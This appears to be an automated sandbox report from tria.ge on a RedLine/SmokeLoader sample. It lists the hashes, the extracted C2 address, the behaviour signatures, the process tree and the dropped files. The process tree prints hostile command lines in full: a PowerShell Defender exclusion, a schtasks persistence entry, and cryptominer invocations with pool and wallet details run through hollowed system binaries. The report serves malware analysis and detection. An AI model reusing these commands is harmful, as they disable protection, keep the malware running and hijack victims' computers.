Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    100s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04/01/2023, 08:06

General

  • Target

    39021047c13e6054cb6e714f20563565.exe

  • Size

    314KB

  • MD5

    39021047c13e6054cb6e714f20563565

  • SHA1

    c4a4a3e2eac3cc8b410c7ebeab2d376f2b514e95

  • SHA256

    0cb4087b8d532e5fae9ff5d39815fd9b394f9e12cbf783a32329f925022350bc

  • SHA512

    6f8272c3fe0e475b533db861388731138de49195081b06ff3791c80f4feb07939b8695bfa3c83746655011fff3e73f65371b1b44dbc72e64d9d2ccee072d5b9f

  • SSDEEP

    6144:zdjdLbFiXyOjzninVBGb6wlEA/qXD3cAyjcbxe:zjtiCGzniVBGb3EAEDMAygV

Malware Config

Extracted

Family

redline

Botnet

GIVEMEMYGUN

C2

193.233.49.83:3321

Attributes
  • auth_value

    862b38f54d952bd9a16b1945a039305a

Signatures

  • Detects Smokeloader packer 1 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Detectes Phoenix Miner Payload 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 6 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Uses the VBS compiler for execution 1 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 8 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 37 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\39021047c13e6054cb6e714f20563565.exe
    "C:\Users\Admin\AppData\Local\Temp\39021047c13e6054cb6e714f20563565.exe"
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    PID:2072
  • C:\Users\Admin\AppData\Local\Temp\D6CD.exe
    C:\Users\Admin\AppData\Local\Temp\D6CD.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Checks SCSI registry key(s)
    • Suspicious use of AdjustPrivilegeToken
    PID:3468
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3468 -s 976
      2⤵
      • Program crash
      PID:1824
  • C:\Users\Admin\AppData\Local\Temp\DCD9.exe
    C:\Users\Admin\AppData\Local\Temp\DCD9.exe
    1⤵
    • Executes dropped EXE
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:5008
    • C:\Users\Admin\AppData\Local\Temp\ghoul.exe
      "C:\Users\Admin\AppData\Local\Temp\ghoul.exe" hvasjw34favaawhnb68
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Suspicious use of SetThreadContext
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4800
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1696
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "PSOBPDL" /tr "C:\ProgramData\Microsoft\PSOBPDL.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:228
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "PSOBPDL" /tr "C:\ProgramData\Microsoft\PSOBPDL.exe"
          4⤵
          • Creates scheduled task(s)
          PID:2124
      • C:\Users\Admin\AppData\Roaming\Program.exe
        "C:\Users\Admin\AppData\Roaming\Program.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:760
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
          4⤵
            PID:4524
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RAiXn2Cm9gBmXtWE1r43sAskTm6LNhULcE.worker -p x -t 4
          3⤵
            PID:3052
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c cls
              4⤵
                PID:5040
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe -pool ssl://eu1-etc.ethermine.org:5555 -wal 0xfD75a752E7594751115555Af6d67B49D8dFf2Ee5.Rig001 -coin etc -log 0
              3⤵
                PID:3924
          • C:\Users\Admin\AppData\Local\Temp\DFB8.exe
            C:\Users\Admin\AppData\Local\Temp\DFB8.exe
            1⤵
            • Executes dropped EXE
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:668
            • C:\Users\Admin\AppData\Local\Temp\ghoul.exe
              "C:\Users\Admin\AppData\Local\Temp\ghoul.exe" hvasjw34favaawhnb68
              2⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:4172
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
                3⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:5096
          • C:\Windows\SysWOW64\explorer.exe
            C:\Windows\SysWOW64\explorer.exe
            1⤵
              PID:5044
            • C:\Windows\explorer.exe
              C:\Windows\explorer.exe
              1⤵
                PID:3068
              • C:\Windows\SysWOW64\explorer.exe
                C:\Windows\SysWOW64\explorer.exe
                1⤵
                  PID:896
                • C:\Windows\explorer.exe
                  C:\Windows\explorer.exe
                  1⤵
                    PID:3776
                  • C:\Windows\SysWOW64\explorer.exe
                    C:\Windows\SysWOW64\explorer.exe
                    1⤵
                      PID:1872
                    • C:\Windows\SysWOW64\explorer.exe
                      C:\Windows\SysWOW64\explorer.exe
                      1⤵
                        PID:3100
                      • C:\Windows\SysWOW64\explorer.exe
                        C:\Windows\SysWOW64\explorer.exe
                        1⤵
                          PID:4652
                        • C:\Windows\explorer.exe
                          C:\Windows\explorer.exe
                          1⤵
                            PID:1800
                          • C:\Windows\SysWOW64\explorer.exe
                            C:\Windows\SysWOW64\explorer.exe
                            1⤵
                              PID:1388
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 3468 -ip 3468
                              1⤵
                                PID:4548

                              Network

                              MITRE ATT&CK Enterprise v6

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                Filesize

                                2KB

                                MD5

                                440cb38dbee06645cc8b74d51f6e5f71

                                SHA1

                                d7e61da91dc4502e9ae83281b88c1e48584edb7c

                                SHA256

                                8ef7a682dfd99ff5b7e9de0e1be43f0016d68695a43c33c028af2635cc15ecfe

                                SHA512

                                3aab19578535e6ba0f6beb5690c87d970292100704209d2dcebddcdd46c6bead27588ef5d98729bfd50606a54cc1edf608b3d15bef42c13b9982aaaf15de7fd6

                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                Filesize

                                944B

                                MD5

                                d28a889fd956d5cb3accfbaf1143eb6f

                                SHA1

                                157ba54b365341f8ff06707d996b3635da8446f7

                                SHA256

                                21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

                                SHA512

                                0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

                              • C:\Users\Admin\AppData\Local\Temp\D6CD.exe

                                Filesize

                                305KB

                                MD5

                                effd444fc9ebb66f7187c407bac43ffe

                                SHA1

                                2ae9f83c9b783ee2317fdd6013377445894e1d68

                                SHA256

                                3575f74003ced283121e83bcdb393cb371862f01fc0ddc00a871cf72252b51e5

                                SHA512

                                0f6be3f85dfd20009892229613ffb15521996ef784f27da6b0bce8558827f501184d443fba7975489f4566f4b2850132ebdbc6a7514832d941222d539fec165b

                              • C:\Users\Admin\AppData\Local\Temp\D6CD.exe

                                Filesize

                                305KB

                                MD5

                                effd444fc9ebb66f7187c407bac43ffe

                                SHA1

                                2ae9f83c9b783ee2317fdd6013377445894e1d68

                                SHA256

                                3575f74003ced283121e83bcdb393cb371862f01fc0ddc00a871cf72252b51e5

                                SHA512

                                0f6be3f85dfd20009892229613ffb15521996ef784f27da6b0bce8558827f501184d443fba7975489f4566f4b2850132ebdbc6a7514832d941222d539fec165b

                              • C:\Users\Admin\AppData\Local\Temp\DCD9.exe

                                Filesize

                                1.6MB

                                MD5

                                ee67ea6b81a0859cbdea2c1a8c689c40

                                SHA1

                                e4425ab917e028be1a349384f4dce4c0eee1f72a

                                SHA256

                                d093cc2e257699ebf02497e30b6c5590ef100f44a7d692d2cac83f0a813985b5

                                SHA512

                                4ef11812363009c8303d2385f08e666c4e9fbe55413577e743350f427794a3663fdae1a2b4d98771ee5f6359c41adec50f10cf733a40a907f1b448bcd3568c99

                              • C:\Users\Admin\AppData\Local\Temp\DCD9.exe

                                Filesize

                                1.6MB

                                MD5

                                ee67ea6b81a0859cbdea2c1a8c689c40

                                SHA1

                                e4425ab917e028be1a349384f4dce4c0eee1f72a

                                SHA256

                                d093cc2e257699ebf02497e30b6c5590ef100f44a7d692d2cac83f0a813985b5

                                SHA512

                                4ef11812363009c8303d2385f08e666c4e9fbe55413577e743350f427794a3663fdae1a2b4d98771ee5f6359c41adec50f10cf733a40a907f1b448bcd3568c99

                              • C:\Users\Admin\AppData\Local\Temp\DFB8.exe

                                Filesize

                                1.6MB

                                MD5

                                ee67ea6b81a0859cbdea2c1a8c689c40

                                SHA1

                                e4425ab917e028be1a349384f4dce4c0eee1f72a

                                SHA256

                                d093cc2e257699ebf02497e30b6c5590ef100f44a7d692d2cac83f0a813985b5

                                SHA512

                                4ef11812363009c8303d2385f08e666c4e9fbe55413577e743350f427794a3663fdae1a2b4d98771ee5f6359c41adec50f10cf733a40a907f1b448bcd3568c99

                              • C:\Users\Admin\AppData\Local\Temp\DFB8.exe

                                Filesize

                                1.6MB

                                MD5

                                ee67ea6b81a0859cbdea2c1a8c689c40

                                SHA1

                                e4425ab917e028be1a349384f4dce4c0eee1f72a

                                SHA256

                                d093cc2e257699ebf02497e30b6c5590ef100f44a7d692d2cac83f0a813985b5

                                SHA512

                                4ef11812363009c8303d2385f08e666c4e9fbe55413577e743350f427794a3663fdae1a2b4d98771ee5f6359c41adec50f10cf733a40a907f1b448bcd3568c99

                              • C:\Users\Admin\AppData\Local\Temp\ghoul.exe

                                Filesize

                                935KB

                                MD5

                                ab99beb3f8c06723ed7bda90e5065901

                                SHA1

                                c576d7a71695be459ed0064cc412d45bfab64d04

                                SHA256

                                cc5b339899f4a126853d0fcffd70c971400ee5049c5d1c1fe881033c2d2f1b0b

                                SHA512

                                b69fe2e3a6bd7b06b54c617827978fb9bb70da42f27ebe006d32988015097d429b60aafdbd4f668d0dccdde0b40101f87942c11594c211da5a2b2d13ed828854

                              • C:\Users\Admin\AppData\Local\Temp\ghoul.exe

                                Filesize

                                935KB

                                MD5

                                ab99beb3f8c06723ed7bda90e5065901

                                SHA1

                                c576d7a71695be459ed0064cc412d45bfab64d04

                                SHA256

                                cc5b339899f4a126853d0fcffd70c971400ee5049c5d1c1fe881033c2d2f1b0b

                                SHA512

                                b69fe2e3a6bd7b06b54c617827978fb9bb70da42f27ebe006d32988015097d429b60aafdbd4f668d0dccdde0b40101f87942c11594c211da5a2b2d13ed828854

                              • C:\Users\Admin\AppData\Local\Temp\ghoul.exe

                                Filesize

                                935KB

                                MD5

                                ab99beb3f8c06723ed7bda90e5065901

                                SHA1

                                c576d7a71695be459ed0064cc412d45bfab64d04

                                SHA256

                                cc5b339899f4a126853d0fcffd70c971400ee5049c5d1c1fe881033c2d2f1b0b

                                SHA512

                                b69fe2e3a6bd7b06b54c617827978fb9bb70da42f27ebe006d32988015097d429b60aafdbd4f668d0dccdde0b40101f87942c11594c211da5a2b2d13ed828854

                              • C:\Users\Admin\AppData\Local\Temp\ghoul.exe

                                Filesize

                                935KB

                                MD5

                                ab99beb3f8c06723ed7bda90e5065901

                                SHA1

                                c576d7a71695be459ed0064cc412d45bfab64d04

                                SHA256

                                cc5b339899f4a126853d0fcffd70c971400ee5049c5d1c1fe881033c2d2f1b0b

                                SHA512

                                b69fe2e3a6bd7b06b54c617827978fb9bb70da42f27ebe006d32988015097d429b60aafdbd4f668d0dccdde0b40101f87942c11594c211da5a2b2d13ed828854

                              • C:\Users\Admin\AppData\Roaming\Program.exe

                                Filesize

                                266KB

                                MD5

                                1c26d22dc1fe8afb79d9ba5987f47dcd

                                SHA1

                                025b02c610b6dceb8204a34d70837813685fed85

                                SHA256

                                47079d77283f2a49dff6f073e1612e23454dcca1235d7c74fbf56b7730d87284

                                SHA512

                                beb70e71cd4616759b373370ab553edbc66e67468f443f0c877a501ccf2c2ac3d565c67ebf4933fceaa483a6eb1af1e582b778a9105981b1c951976733a06918

                              • C:\Users\Admin\AppData\Roaming\Program.exe

                                Filesize

                                266KB

                                MD5

                                1c26d22dc1fe8afb79d9ba5987f47dcd

                                SHA1

                                025b02c610b6dceb8204a34d70837813685fed85

                                SHA256

                                47079d77283f2a49dff6f073e1612e23454dcca1235d7c74fbf56b7730d87284

                                SHA512

                                beb70e71cd4616759b373370ab553edbc66e67468f443f0c877a501ccf2c2ac3d565c67ebf4933fceaa483a6eb1af1e582b778a9105981b1c951976733a06918

                              • memory/668-151-0x0000000005830000-0x000000000583A000-memory.dmp

                                Filesize

                                40KB

                              • memory/896-229-0x00000000007F0000-0x00000000007F5000-memory.dmp

                                Filesize

                                20KB

                              • memory/896-189-0x00000000007F0000-0x00000000007F5000-memory.dmp

                                Filesize

                                20KB

                              • memory/896-190-0x00000000007E0000-0x00000000007E9000-memory.dmp

                                Filesize

                                36KB

                              • memory/1012-266-0x0000000002760000-0x0000000002770000-memory.dmp

                                Filesize

                                64KB

                              • memory/1012-183-0x0000000002760000-0x0000000002770000-memory.dmp

                                Filesize

                                64KB

                              • memory/1012-154-0x0000000002760000-0x0000000002770000-memory.dmp

                                Filesize

                                64KB

                              • memory/1012-152-0x0000000002760000-0x0000000002770000-memory.dmp

                                Filesize

                                64KB

                              • memory/1012-260-0x0000000002760000-0x0000000002770000-memory.dmp

                                Filesize

                                64KB

                              • memory/1012-160-0x0000000002760000-0x0000000002770000-memory.dmp

                                Filesize

                                64KB

                              • memory/1012-159-0x0000000002760000-0x0000000002770000-memory.dmp

                                Filesize

                                64KB

                              • memory/1012-268-0x0000000002760000-0x0000000002770000-memory.dmp

                                Filesize

                                64KB

                              • memory/1012-153-0x0000000002760000-0x0000000002770000-memory.dmp

                                Filesize

                                64KB

                              • memory/1012-168-0x0000000002760000-0x0000000002770000-memory.dmp

                                Filesize

                                64KB

                              • memory/1012-167-0x0000000007BB0000-0x0000000007BC0000-memory.dmp

                                Filesize

                                64KB

                              • memory/1012-166-0x0000000002760000-0x0000000002770000-memory.dmp

                                Filesize

                                64KB

                              • memory/1012-171-0x0000000002760000-0x0000000002770000-memory.dmp

                                Filesize

                                64KB

                              • memory/1012-261-0x0000000002760000-0x0000000002770000-memory.dmp

                                Filesize

                                64KB

                              • memory/1012-173-0x0000000002760000-0x0000000002770000-memory.dmp

                                Filesize

                                64KB

                              • memory/1012-269-0x0000000002760000-0x0000000002770000-memory.dmp

                                Filesize

                                64KB

                              • memory/1012-270-0x0000000002760000-0x0000000002770000-memory.dmp

                                Filesize

                                64KB

                              • memory/1012-181-0x0000000002760000-0x0000000002770000-memory.dmp

                                Filesize

                                64KB

                              • memory/1012-271-0x0000000002760000-0x0000000002770000-memory.dmp

                                Filesize

                                64KB

                              • memory/1012-180-0x0000000002760000-0x0000000002770000-memory.dmp

                                Filesize

                                64KB

                              • memory/1012-157-0x0000000002760000-0x0000000002770000-memory.dmp

                                Filesize

                                64KB

                              • memory/1012-273-0x0000000002760000-0x0000000002770000-memory.dmp

                                Filesize

                                64KB

                              • memory/1012-175-0x0000000002760000-0x0000000002770000-memory.dmp

                                Filesize

                                64KB

                              • memory/1012-282-0x0000000002760000-0x0000000002770000-memory.dmp

                                Filesize

                                64KB

                              • memory/1012-184-0x0000000002760000-0x0000000002770000-memory.dmp

                                Filesize

                                64KB

                              • memory/1012-272-0x0000000002760000-0x0000000002770000-memory.dmp

                                Filesize

                                64KB

                              • memory/1012-230-0x0000000007C30000-0x0000000007C40000-memory.dmp

                                Filesize

                                64KB

                              • memory/1012-274-0x0000000002760000-0x0000000002770000-memory.dmp

                                Filesize

                                64KB

                              • memory/1012-188-0x0000000002760000-0x0000000002770000-memory.dmp

                                Filesize

                                64KB

                              • memory/1012-227-0x0000000007C30000-0x0000000007C40000-memory.dmp

                                Filesize

                                64KB

                              • memory/1012-263-0x0000000002760000-0x0000000002770000-memory.dmp

                                Filesize

                                64KB

                              • memory/1012-267-0x0000000002760000-0x0000000002770000-memory.dmp

                                Filesize

                                64KB

                              • memory/1012-176-0x0000000002760000-0x0000000002770000-memory.dmp

                                Filesize

                                64KB

                              • memory/1012-172-0x0000000007C30000-0x0000000007C40000-memory.dmp

                                Filesize

                                64KB

                              • memory/1012-191-0x0000000007C30000-0x0000000007C40000-memory.dmp

                                Filesize

                                64KB

                              • memory/1388-223-0x0000000000BF0000-0x0000000000BF8000-memory.dmp

                                Filesize

                                32KB

                              • memory/1388-222-0x0000000000BE0000-0x0000000000BEB000-memory.dmp

                                Filesize

                                44KB

                              • memory/1388-239-0x0000000000BF0000-0x0000000000BF8000-memory.dmp

                                Filesize

                                32KB

                              • memory/1696-214-0x00007FFD3E170000-0x00007FFD3EC31000-memory.dmp

                                Filesize

                                10.8MB

                              • memory/1696-202-0x00007FFD3E170000-0x00007FFD3EC31000-memory.dmp

                                Filesize

                                10.8MB

                              • memory/1696-200-0x00000181A7F90000-0x00000181A7FB2000-memory.dmp

                                Filesize

                                136KB

                              • memory/1800-237-0x0000000001200000-0x0000000001207000-memory.dmp

                                Filesize

                                28KB

                              • memory/1800-221-0x0000000000FF0000-0x0000000000FFD000-memory.dmp

                                Filesize

                                52KB

                              • memory/1800-220-0x0000000001200000-0x0000000001207000-memory.dmp

                                Filesize

                                28KB

                              • memory/1872-203-0x0000000000BC0000-0x0000000000BE2000-memory.dmp

                                Filesize

                                136KB

                              • memory/1872-204-0x0000000000B90000-0x0000000000BB7000-memory.dmp

                                Filesize

                                156KB

                              • memory/1872-233-0x0000000000BC0000-0x0000000000BE2000-memory.dmp

                                Filesize

                                136KB

                              • memory/2072-134-0x00000000001F0000-0x00000000001F9000-memory.dmp

                                Filesize

                                36KB

                              • memory/2072-135-0x0000000000400000-0x0000000002C41000-memory.dmp

                                Filesize

                                40.3MB

                              • memory/2072-136-0x0000000000400000-0x0000000002C41000-memory.dmp

                                Filesize

                                40.3MB

                              • memory/2072-133-0x0000000002C50000-0x0000000002D50000-memory.dmp

                                Filesize

                                1024KB

                              • memory/3052-258-0x0000000140000000-0x00000001400C6000-memory.dmp

                                Filesize

                                792KB

                              • memory/3052-255-0x0000000140000000-0x00000001400C6000-memory.dmp

                                Filesize

                                792KB

                              • memory/3052-256-0x0000000140000000-0x00000001400C6000-memory.dmp

                                Filesize

                                792KB

                              • memory/3052-253-0x0000000140000000-0x00000001400C6000-memory.dmp

                                Filesize

                                792KB

                              • memory/3068-187-0x00000000001C0000-0x00000000001C9000-memory.dmp

                                Filesize

                                36KB

                              • memory/3068-170-0x00000000001B0000-0x00000000001BF000-memory.dmp

                                Filesize

                                60KB

                              • memory/3068-228-0x00000000001C0000-0x00000000001C9000-memory.dmp

                                Filesize

                                36KB

                              • memory/3100-208-0x0000000000EE0000-0x0000000000EE9000-memory.dmp

                                Filesize

                                36KB

                              • memory/3100-234-0x0000000000EF0000-0x0000000000EF5000-memory.dmp

                                Filesize

                                20KB

                              • memory/3100-210-0x0000000000EF0000-0x0000000000EF5000-memory.dmp

                                Filesize

                                20KB

                              • memory/3468-161-0x0000000000470000-0x0000000000570000-memory.dmp

                                Filesize

                                1024KB

                              • memory/3468-215-0x0000000002710000-0x0000000003710000-memory.dmp

                                Filesize

                                16.0MB

                              • memory/3468-164-0x0000000000400000-0x000000000046A000-memory.dmp

                                Filesize

                                424KB

                              • memory/3468-225-0x0000000001F70000-0x0000000001F8D000-memory.dmp

                                Filesize

                                116KB

                              • memory/3468-207-0x0000000001F70000-0x0000000001F8D000-memory.dmp

                                Filesize

                                116KB

                              • memory/3468-224-0x0000000000400000-0x000000000046A000-memory.dmp

                                Filesize

                                424KB

                              • memory/3468-163-0x00000000020A0000-0x00000000020D4000-memory.dmp

                                Filesize

                                208KB

                              • memory/3776-196-0x0000000000C80000-0x0000000000C8C000-memory.dmp

                                Filesize

                                48KB

                              • memory/3776-232-0x0000000000C90000-0x0000000000C96000-memory.dmp

                                Filesize

                                24KB

                              • memory/3776-201-0x0000000000C90000-0x0000000000C96000-memory.dmp

                                Filesize

                                24KB

                              • memory/3924-289-0x0000000140000000-0x000000014082B000-memory.dmp

                                Filesize

                                8.2MB

                              • memory/3924-291-0x0000000140000000-0x000000014082B000-memory.dmp

                                Filesize

                                8.2MB

                              • memory/3924-292-0x0000000140000000-0x000000014082B000-memory.dmp

                                Filesize

                                8.2MB

                              • memory/3924-293-0x0000000140000000-0x000000014082B000-memory.dmp

                                Filesize

                                8.2MB

                              • memory/4172-194-0x00007FFD3E170000-0x00007FFD3EC31000-memory.dmp

                                Filesize

                                10.8MB

                              • memory/4172-197-0x00007FFD3E170000-0x00007FFD3EC31000-memory.dmp

                                Filesize

                                10.8MB

                              • memory/4524-252-0x0000000005750000-0x000000000578C000-memory.dmp

                                Filesize

                                240KB

                              • memory/4524-251-0x0000000005820000-0x000000000592A000-memory.dmp

                                Filesize

                                1.0MB

                              • memory/4524-250-0x00000000056F0000-0x0000000005702000-memory.dmp

                                Filesize

                                72KB

                              • memory/4524-249-0x0000000005D10000-0x0000000006328000-memory.dmp

                                Filesize

                                6.1MB

                              • memory/4524-244-0x0000000000400000-0x0000000000438000-memory.dmp

                                Filesize

                                224KB

                              • memory/4652-216-0x0000000000FE0000-0x0000000000FE6000-memory.dmp

                                Filesize

                                24KB

                              • memory/4652-217-0x0000000000FD0000-0x0000000000FDB000-memory.dmp

                                Filesize

                                44KB

                              • memory/4652-235-0x0000000000FE0000-0x0000000000FE6000-memory.dmp

                                Filesize

                                24KB

                              • memory/4800-192-0x00007FFD3E170000-0x00007FFD3EC31000-memory.dmp

                                Filesize

                                10.8MB

                              • memory/4800-185-0x0000000000EF0000-0x0000000000FDE000-memory.dmp

                                Filesize

                                952KB

                              • memory/4800-231-0x00007FFD3E170000-0x00007FFD3EC31000-memory.dmp

                                Filesize

                                10.8MB

                              • memory/5008-144-0x0000000000CD0000-0x0000000000E66000-memory.dmp

                                Filesize

                                1.6MB

                              • memory/5008-146-0x0000000005EF0000-0x0000000006494000-memory.dmp

                                Filesize

                                5.6MB

                              • memory/5008-149-0x0000000005AE0000-0x0000000005B72000-memory.dmp

                                Filesize

                                584KB

                              • memory/5044-156-0x0000000000830000-0x0000000000837000-memory.dmp

                                Filesize

                                28KB

                              • memory/5044-158-0x0000000000820000-0x000000000082B000-memory.dmp

                                Filesize

                                44KB

                              • memory/5044-226-0x0000000000830000-0x0000000000837000-memory.dmp

                                Filesize

                                28KB

                              • memory/5096-206-0x00007FFD3E170000-0x00007FFD3EC31000-memory.dmp

                                Filesize

                                10.8MB

                              • memory/5096-213-0x00007FFD3E170000-0x00007FFD3EC31000-memory.dmp

                                Filesize

                                10.8MB